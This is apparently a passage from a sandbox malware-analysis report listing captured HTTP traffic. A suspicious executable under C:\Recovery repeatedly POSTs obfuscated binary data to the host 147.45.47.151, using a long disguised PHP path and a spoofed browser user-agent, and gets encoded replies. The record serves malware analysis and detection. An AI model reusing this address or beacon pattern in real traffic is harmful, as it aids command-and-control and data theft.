                                                                                          Dec 10, 2024 07:28:49.007172108 CET2512OUTData Raw: 52 5b 5f 5b 5e 55 55 5b 58 57 5a 57 52 5c 51 57 5b 5d 5d 48 57 53 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[_[^UU[XWZWR\QW[]]HWSP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"& [ &!5)>000')4!"<+/>+9[7 -9.\%!Z+


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.849742147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:49.519457102 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1992
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:49.873718023 CET1992OUTData Raw: 52 5c 5f 58 5b 5f 55 50 58 57 5a 57 52 55 51 5c 5b 5d 5d 49 57 52 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_X[_UPXWZWRUQ\[]]IWRP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2/ \ *!P9Y*3$00#![(83)]6!".9.\%!Z+
                                                                                          Dec 10, 2024 07:28:50.779553890 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:51.012898922 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 03 37 3a 23 5b 26 0d 33 0f 2f 08 2c 0c 32 3e 3c 1a 3e 22 0f 05 27 2b 2b 5f 3a 31 3c 0d 3e 13 31 5a 3f 3a 38 56 3d 01 05 57 27 0f 21 46 0c 1d 24 17 24 05 32 5f 30 3d 09 17 26 3c 34 07 33 32 27 15 3e 0d 2f 08 34 20 2f 5a 27 20 37 0c 2d 3e 36 55 38 25 0c 41 2a 0b 35 0b 26 02 22 57 0d 12 27 16 31 09 3a 07 22 22 21 0d 21 0f 0e 1d 2b 0b 38 5c 24 00 23 59 36 04 3a 05 30 31 2c 12 37 34 38 11 2b 05 39 01 26 03 3d 0b 24 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98&7:#[&3/,2><>"'++_:1<>1Z?:8V=W'!F$$2_0=&<432'>/4 /Z' 7->6U8%A*5&"W'1:""!!+8\$#Y6:01,748+9&=$ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.849743147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:49.672847033 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:50.022743940 CET2512OUTData Raw: 52 5b 5f 5d 5e 5d 55 5d 58 57 5a 57 52 53 51 56 5b 51 5d 40 57 53 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R[_]^]U]XWZWRSQV[Q]@WSPY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z2?$[7)"P9X*.#00Y0W6")(>+[42]/9.\%!Z+<
                                                                                          Dec 10, 2024 07:28:50.937582016 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:51.172975063 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          28192.168.2.849744147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:51.465725899 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:51.883992910 CET2512OUTData Raw: 57 5c 5f 58 5e 55 50 5d 58 57 5a 57 52 53 51 5c 5b 5d 5d 45 57 5e 50 55 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\_X^UP]XWZWRSQ\[]]EW^PU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"', ^#9&#66)._0<<\'?"X:<$S>+X71(99.\%!Z+<
                                                                                          Dec 10, 2024 07:28:52.727351904 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:52.960665941 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          29192.168.2.849745147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:53.233284950 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:53.677290916 CET2512OUTData Raw: 57 5e 5a 5d 5b 5c 50 59 58 57 5a 57 52 52 51 50 5b 5b 5d 44 57 5f 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W^Z][\PYXWZWRRQP[[]DW_PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"\&!:Q!=^=>?[0/7'\+".:+8;)X ?:).\%!Z+
                                                                                          Dec 10, 2024 07:28:54.491266012 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:54.725727081 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:54 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          30192.168.2.849746147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:54.971955061 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:55.319562912 CET2512OUTData Raw: 52 5e 5a 5a 5b 58 55 5d 58 57 5a 57 52 53 51 52 5b 58 5d 41 57 5f 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R^ZZ[XU]XWZWRSQR[X]AW_P[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^&<<\7-!&(.+Z0?\39$R5Y(+#**7-.\%!Z+<
                                                                                          Dec 10, 2024 07:28:56.235207081 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:56.469012022 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:56 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0
                                                                                          Dec 10, 2024 07:28:56.741139889 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:57.107562065 CET2004OUTData Raw: 52 5c 5f 53 5e 59 55 5d 58 57 5a 57 52 57 51 55 5b 5e 5d 42 57 51 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_S^YU]XWZWRWQU[^]BWQP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"\2<7#-6&)=/'<8]3976:)()_77]-.\%!Z+,
                                                                                          Dec 10, 2024 07:28:57.142929077 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:57.644803047 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:57 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 03 20 00 34 04 32 30 20 1f 2f 32 2f 57 26 13 28 18 3d 54 2a 5c 32 01 27 5f 2e 0c 24 08 3d 04 3d 58 3c 39 37 0e 3f 2c 2b 53 30 0f 21 46 0c 1d 27 04 26 28 3d 06 24 5b 27 15 33 06 28 02 24 32 3b 15 2a 33 0d 0d 34 23 3b 5a 24 0a 27 0c 3b 04 36 55 2f 1b 3a 42 2b 22 3d 0c 32 38 22 57 0d 12 27 16 24 30 36 07 22 22 08 1c 21 1f 05 0b 28 1b 2f 02 33 00 3c 04 35 04 3a 02 30 31 06 12 34 51 28 5f 3f 38 2d 02 31 04 3a 50 33 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98& 420 /2/W&(=T*\2'_.$==X<97?,+S0!F'&(=$['3($2;*34#;Z$';6U/:B+"=28"W'$06""!(/3<5:014Q(_?8-1:P3 ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          31192.168.2.849747147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:57.384627104 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:57.741681099 CET2512OUTData Raw: 57 5f 5f 5a 5e 5c 55 58 58 57 5a 57 52 50 51 50 5b 51 5d 45 57 5f 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__Z^\UXXWZWRPQP[Q]EW_PX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!137!!P:*#Z'/$]0<6)+>>71(9.\%!Z+0
                                                                                          Dec 10, 2024 07:28:58.645900011 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:58.880788088 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:58 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          32192.168.2.849749147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:59.642604113 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:59.991554976 CET2512OUTData Raw: 57 5f 5f 58 5e 5a 55 5b 58 57 5a 57 52 50 51 54 5b 59 5d 45 57 55 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__X^ZU[XWZWRPQT[Y]EWUPT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"^%Y0^7:*!P5_>>^$<3+ >&<8W*]9[#+..\%!Z+0
                                                                                          Dec 10, 2024 07:29:00.904056072 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:01.140784025 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:00 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          33192.168.2.849750147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:01.377743959 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:01.953378916 CET2512OUTData Raw: 57 51 5f 58 5e 5a 55 5f 58 57 5a 57 52 5c 51 57 5b 59 5d 41 57 53 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WQ_X^ZU_XWZWR\QW[Y]AWSP]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z%4^#\:U!6)Y)7'Y<X'\<U!%\<; +8&718..\%!Z+
                                                                                          Dec 10, 2024 07:29:02.648700953 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:02.884995937 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:02 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          34192.168.2.849757147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:02.772418976 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1984
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:03.128452063 CET1984OUTData Raw: 52 5c 5a 5a 5e 5a 55 5f 58 57 5a 57 52 53 51 57 5b 58 5d 40 57 5f 50 5d 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\ZZ^ZU_XWZWRSQW[X]@W_P]^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_%/ 9%"*?[$Y('$5=%Z<8*;%X7X..\%!Z+<
                                                                                          Dec 10, 2024 07:29:04.033986092 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:04.268830061 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:03 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 26 07 23 17 27 5a 31 23 24 56 2f 0f 3b 13 25 13 05 45 2b 22 22 58 27 28 23 17 2e 54 2b 1c 3e 2d 0b 5d 28 14 02 57 2a 2f 23 10 24 35 21 46 0c 1d 24 14 27 3b 29 00 24 13 23 5f 27 01 23 5e 30 54 34 05 2a 23 28 50 34 23 0d 5b 30 1d 0a 55 3b 03 32 1c 2f 26 3d 1a 29 1c 25 0d 26 12 22 57 0d 12 27 1b 25 09 39 5b 20 0b 21 0f 36 31 20 53 2b 0b 02 13 33 3e 37 59 22 04 17 11 26 21 01 02 34 19 27 06 3f 02 22 5b 26 5b 2e 52 24 3b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98&#'Z1#$V/;%E+""X'(#.T+>-](W*/#$5!F$';)$#_'#^0T4*#(P4#[0U;2/&=)%&"W'%9[ !61 S+3>7Y"&!4'?"[&[.R$; ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          35192.168.2.849758147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:03.263283014 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:03.620769978 CET2512OUTData Raw: 52 59 5a 58 5e 55 55 5d 58 57 5a 57 52 50 51 51 5b 5b 5d 41 57 50 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RYZX^UU]XWZWRPQQ[[]AWPP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"[2, Z *:"Y),'?$)?"(+3)%7T'Y/).\%!Z+0
                                                                                          Dec 10, 2024 07:29:04.524220943 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:04.756673098 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:04 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          36192.168.2.849765147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:29:05.154058933 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:29:05.507013083 CET2512OUTData Raw: 52 5c 5f 53 5e 5c 55 50 58 57 5a 57 52 50 51 5c 5b 59 5d 47 57 5f 50 5a 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_S^\UPXWZWRPQ\[Y]GW_PZ^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!14)=!69>4%?'7!>)(P+;>4! :).\%!Z+0
                                                                                          Dec 10, 2024 07:29:06.367384911 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:29:06.600931883 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:29:06 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
